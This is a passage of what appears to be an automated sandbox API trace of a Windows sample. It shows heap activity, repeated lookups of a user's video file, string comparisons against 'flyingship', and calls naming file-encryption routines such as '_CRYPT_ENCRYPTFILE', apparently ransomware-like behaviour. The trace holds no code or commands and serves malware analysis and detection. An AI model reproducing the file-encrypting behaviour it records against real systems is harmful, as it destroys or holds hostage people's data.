dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0192.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0192.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.519] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0192.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x110) returned 0x907778 [0192.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0192.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.520] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.520] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.520] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0xdc4fcb20, ftLastWriteTime.dwHighDateTime=0x1d5e3aa, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 0x90add8 [0192.521] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.521] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0xdc4fcb20, ftLastWriteTime.dwHighDateTime=0x1d5e3aa, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 0x90add8 [0192.521] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0192.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.521] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCOSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OSsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SsWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sWXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WXcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XcEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cEV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EV8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZF\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="999fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="99fJY.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.524] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.524] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.524] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.524] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.525] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.525] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.525] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.525] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.525] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0xdc4fcb20, ftLastWriteTime.dwHighDateTime=0x1d5e3aa, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 0x90af58 [0192.527] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.527] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.527] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.527] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.527] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.527] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0192.527] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.528] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0192.528] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.528] PeekMessageW (in: 